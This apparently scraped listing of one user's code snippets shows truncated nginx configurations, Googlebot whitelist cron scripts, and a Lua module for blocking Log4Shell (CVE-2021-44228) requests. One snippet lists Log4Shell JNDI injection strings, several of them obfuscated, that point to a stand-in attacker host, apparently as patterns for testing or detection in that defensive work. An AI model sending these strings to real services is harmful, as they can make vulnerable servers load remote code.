johnhpatton

stream {
  # Set resolver to a name server that can resolve the domain
  # for the zone_sync_server DNS to all webtier IPs.
  resolver 10.0.0.1;
  
  server {
    listen 9443 reuseport;

    zone_sync;
    zone_sync_server api.prod.int.example.com:9443 resolve;

johnhpatton

#!/usr/bin/env bash
# update-googlebot-whitelist-keyval.sh
# 
#
# Cron daily with this format:
# 0 0 * * * /usr/local/bin/update-googlebot-whitelist-keyval.sh &>/dev/null


# Check for dependencies, this process requires curl and jq:
if ! type -P curl &>/dev/null; then

johnhpatton

# whitelist.conf
# Geo maps that build a $whitelist map variable.
# 
# NOTES
# * This relies on an $is_google geo map set in a separate .conf file.
# * Update $remote_addr used in the maps to a variable that holds the
#    real client IP address, or set a proxy configuration in the geo 
#    map. See the documentation for guidance.
# * Using $remote_addr in geo maps is not required and is the default
#    variable used in the lookup. If setting a proxy configuration in

johnhpatton

#!/usr/bin/env bash
# generate-nginx-googlebot-whitelist.sh
#
# Cron daily with this format:
# 0 0 * * * /usr/local/bin/generate-nginx-googlebot-whitelist.sh reload &>/dev/null

# Update GOOGLE_WHITELIST_CONF to point to a configuration file that is included
GOOGLE_WHITELIST_CONF="/etc/nginx/conf.d/google-whitelist.conf"

# Update RELOAD_CMD with the command used to reload the nginx configuration

johnhpatton

declare -a PATTERNS=()
           PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}')
           PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}')
           PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}')
           PATTERNS+=('${j${::-nD}i${::-:}}')
           PATTERNS+=('${j${EnV:K5:-nD}i:}')
           PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${j${loWer:Nd}i${uPper::}}')
           PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }')

johnhpatton

-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: [email protected]; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software

johnhpatton

-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: [email protected]; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software

johnhpatton

# /etc/nginx/conf.d/default.conf
server {
    listen       80 default_server;
    server_name  localhost;

    set $captured_request_headers "";
    set $captured_request_body "";
    set $cve_2021_44228_log "";
    rewrite_by_lua_block {
        cve_2021_44228.block_cve_2021_44228()

johnhpatton

# /etc/nginx/conf.d/lua.conf
# GLOBAL LUA -- HTTP BLOCK LEVEL

# Lua locations
# $prefix is the server prefix ( -p {server_prefix} ) passed in
# to nginx at startup, or the default build prefix (/etc/nginx/).
lua_package_path "${prefix}conf.d/?.lua;/usr/local/lib/lua/?.lua;;";
lua_package_cpath "/usr/lib64/lua/5.1/?.so;;";

# Disable logging cosocket lua TCP socket read timeout.

johnhpatton

# /etc/nginx/nginx.conf
# nginx plus implementation for RHEL hosts
load_module modules/ndk_http_module.so;
load_module modules/ngx_http_lua_module.so;

error_log  /var/log/nginx/error.log error;
pid        /var/run/nginx.pid;
lock_file  /var/lock/nginx.lock;

worker_processes     auto;